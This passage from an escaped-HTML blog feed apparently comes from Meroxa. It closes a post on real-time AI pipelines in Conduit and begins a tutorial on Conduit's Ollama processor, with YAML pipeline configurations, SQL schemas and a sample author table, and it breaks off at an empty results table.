      &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;gpt-4&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.customer_message&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Analyze the sentiment of this customer message and classify as positive, negative, or neutral.&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This processor automatically handles API authentication, rate limiting, error retries, and response parsing. Your AI logic becomes a configuration, not custom code.&lt;/p&gt;
&lt;h3&gt;Complex Workflows, Simple Configuration&lt;/h3&gt;
&lt;p&gt;Real-world AI pipelines require multiple processing steps and service integrations. Conduit makes sophisticated workflows simple through declarative configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;# Generate AI summary&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ai&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;summarizer
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;openai.textgen&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;gpt-4&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.Payload.After.summary&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Summarize this support ticket in 2-3 sentences&quot;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;# Generate embeddings for vector search&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; embeddings
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;openai.embeddings&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;text-embedding-3-small&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.Payload.After.embedding&quot;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;# Format for Slack notification&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; slack&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;formatter
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;field.set&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.Payload.After.slack_message&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;*New Ticket #{{.Payload.After.ticket_id}}*\\n{{.Payload.After.summary}}\\nPriority: {{.Payload.After.priority}}&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Built-in Reliability and Scaling&lt;/h3&gt;
&lt;p&gt;Conduit handles the operational complexity that typically derails AI pipeline projects:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automatic Error Handling&lt;/strong&gt;: Failed records are automatically retried with exponential backoff. Persistent failures are routed to dead letter queues for investigation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Backpressure Management&lt;/strong&gt;: When downstream services (like AI APIs) become slow or unavailable, Conduit automatically slows down processing to prevent system overload.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ordered Delivery&lt;/strong&gt;: Messages from a single source connector are guaranteed to flow through the Conduit pipeline in the same order in which they were produced by that source.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Horizontal Scaling&lt;/strong&gt;: As your data volume grows, you can scale Conduit horizontally across multiple machines without changing your pipeline configuration.&lt;/p&gt;
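&lt;p&gt;As a sketch of how this looks in practice, failure handling can be tuned per pipeline through a dead-letter queue. The field names below follow Conduit&apos;s DLQ configuration, and the values are illustrative, so check them against the documentation for your Conduit version:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;pipelines:
  - id: tickets-pipeline
    # Route records that keep failing to a dead-letter queue
    dead-letter-queue:
      plugin: &quot;builtin:log&quot;        # any destination connector can act as the DLQ
      settings:
        level: error
      window-size: 5               # look at the last 5 record acknowledgments
      window-nack-threshold: 2     # stop the pipeline if 2 of them are negative&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;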
&lt;h2&gt;The Broader Impact: AI That Keeps Up With Reality&lt;/h2&gt;
&lt;p&gt;Real-time AI workflows enabled by tools like Conduit represent more than just technical improvements—they enable fundamentally different approaches to business problems.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Proactive Instead of Reactive&lt;/strong&gt;: When AI systems can respond to events as they happen, they shift from reactive tools that analyze what happened to proactive systems that influence what happens next.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Compound Intelligence&lt;/strong&gt;: Real-time AI systems can build on their own outputs, creating feedback loops that improve performance over time. A customer service AI that learns from each interaction can provide better responses throughout the day, not just in the next batch cycle.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Human-AI Collaboration&lt;/strong&gt;: Real-time systems enable natural collaboration between humans and AI. Instead of humans waiting for batch reports, they can work alongside AI systems that provide insights and assistance in real-time.&lt;/p&gt;
&lt;h2&gt;Batch is the Past&lt;/h2&gt;
&lt;p&gt;The organizations that thrive in the AI-powered future will be those that can respond to opportunities and challenges as they emerge, not those that analyze them after the fact. Real-time data streaming isn&apos;t just a technical architecture choice—it&apos;s a strategic advantage.&lt;/p&gt;
&lt;p&gt;Tools like Conduit make real-time AI workflows accessible to any organization, regardless of their current technical infrastructure or data engineering expertise. The question isn&apos;t whether you&apos;ll eventually need real-time AI capabilities—it&apos;s whether you&apos;ll build them before or after your competitors do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to build your first real-time AI pipeline?&lt;/strong&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit-ai-pipelines&quot;&gt;Check out our examples&lt;/a&gt; or &lt;a href=&quot;https://conduit.io/docs/getting-started&quot;&gt;get started with Conduit&lt;/a&gt; today.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;What real-time AI use cases are you most excited about? Share your thoughts and questions in the comments below, or &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;join our Discord community&lt;/a&gt; to continue the conversation.&lt;/em&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Skip the Cloud, Keep the Power: Real-Time AI with Conduit and Llama]]></title><description><![CDATA[Conduit 0.13.5 has introduced a new builtin processor, the Ollama processor. This processor provides the capability to enhance data in Conduit pipelines by sending a prompt to a specified large language model (LLM).]]></description><link>https://meroxa.com/blog/skip-the-cloud-keep-the-power-real-time-ai-with-conduit-and-llama</link><guid isPermaLink="false">https://meroxa.com/blog/skip-the-cloud-keep-the-power-real-time-ai-with-conduit-and-llama</guid><dc:creator><![CDATA[Sarah Sicard]]></dc:creator><pubDate>Wed, 04 Jun 2025 11:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The latest Conduit release, &lt;a href=&quot;https://conduit.io/changelog/2025-05-20-conduit-0-13-5-release&quot;&gt;v0.13.5&lt;/a&gt;, has introduced a new builtin processor, the &lt;a href=&quot;https://conduit.io/docs/using/processors/builtin/ollama&quot;&gt;Ollama processor&lt;/a&gt;. This processor provides the capability to enhance data in Conduit pipelines by sending a prompt to a specified large language model (LLM). By sending prompts to a self-hosted model through Ollama, users can perform data transformation directly in their pipeline.&lt;/p&gt;
&lt;p&gt;In this post, we will explore what Ollama is and work through some examples of how the Ollama processor can be used for data processing within Conduit.&lt;/p&gt;
&lt;h2&gt;What is Ollama?&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://ollama.com/&quot;&gt;Ollama&lt;/a&gt; is a self-hosted tool that creates a bridge between a machine and an LLM. Self-hosting offers advantages such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Privacy&lt;/strong&gt; - All data remains on the user’s machine rather than being routed through the LLM’s parent company.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Availability&lt;/strong&gt; - There is no dependence on the availability of the LLM’s parent company.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ollama empowers developers with greater flexibility and autonomy, eliminating the need to depend on third-party services.&lt;/p&gt;
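&lt;p&gt;Before wiring Ollama into a pipeline, the model has to be available locally. Assuming Ollama is already installed, this typically takes two commands (the model name matches the examples below; Ollama listens on port 11434 by default):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;# download the model used in the examples in this post
ollama pull llama3.2

# start the Ollama server (default address: http://127.0.0.1:11434)
ollama serve&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;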
&lt;h2&gt;Examples&lt;/h2&gt;
&lt;p&gt;Let’s walk through a few examples of the capabilities of the Ollama processor within Conduit pipelines.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Extrapolate missing data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Imagine that I am trying to get information on various books from my old database into a new database with a different table format. My original table follows a schema like the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; authors &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	id &lt;span class=&quot;token keyword&quot;&gt;SERIAL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	age &lt;span class=&quot;token keyword&quot;&gt;INTEGER&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	books &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;However, my new table that I am looking to transfer my data to follows the schema below:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; author_info &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	id &lt;span class=&quot;token keyword&quot;&gt;SERIAL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	first_name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	last_name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	year_of_birth &lt;span class=&quot;token keyword&quot;&gt;INTEGER&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	books &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To populate the new table, I will need to ask the LLM to split the given name into a first and last name and to look up the year of birth.&lt;/p&gt;
&lt;p&gt;I created a sample Conduit pipeline using the following configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;author&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
  &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
  &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;authors&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client1?sslmode=disable&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; dest&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;postgres
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://username:password@localhost:5433/client2?sslmode=disable&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;author_info&quot;&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ollama&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;ollama
      &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://127.0.0.1:11434&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;llama3.2&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token scalar string&quot;&gt;
          Take the given input, and put the information into a json of the following format:
            {&lt;/span&gt;
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;year_of_birth&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; 
	            &lt;span class=&quot;token key atrule&quot;&gt;&quot;books&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;something&quot;&lt;/span&gt;
	           &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
          The incoming name is a famous author&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; so if the author has three names&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; please determine whether the middle name should be part of their first name or their last name. You can assume the name field in the input is formatted \&quot;firstname lastname\&quot;.
          The year_of_birth field should be determined based off of the year the author was born. If that cannot be found&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; determine based on the current year minus the incoming age of the author.
          The books field will only contain one book&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; do not return a list.&quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After running Conduit on this pipeline, all rows from my original table are transferred, with the results below (source table first, destination table second).&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;          name          &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; age &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;               books
&lt;span class=&quot;token comment&quot;&gt;----+------------------------+-----+-----------------------------------&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charles Dickens        &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;58&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Oliver Twist
  &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane Austin            &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;41&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Pride &lt;span class=&quot;token operator&quot;&gt;and&lt;/span&gt; Prejudice
  &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charlotte Bronte       &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;38&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Jane Eyre
  &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Edgar Allan Poe        &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;40&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Raven
  &lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Gabriel Garcia Marquez &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;80&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; One Hundred Years &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Solitude
  &lt;span class=&quot;token number&quot;&gt;6&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Sylvia Plath           &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;43&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Bell Jar
  &lt;span class=&quot;token number&quot;&gt;7&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Arthur Conan Doyle     &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;76&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; The Adventures &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Sherlock Holmes
  &lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Ray Bradberry          &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;45&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Fahrenheit &lt;span class=&quot;token number&quot;&gt;451&lt;/span&gt;
  &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; L Frank Baum           &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;90&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Wizard &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Oz
 &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Charles Darwin         &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; Origin &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; Species&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt; id &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; first_name &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;  last_name  &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; year_of_birth &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt;               books
&lt;span class=&quot;token comment&quot;&gt;----+------------+-------------+---------------+-----------------------------------&lt;/span&gt;
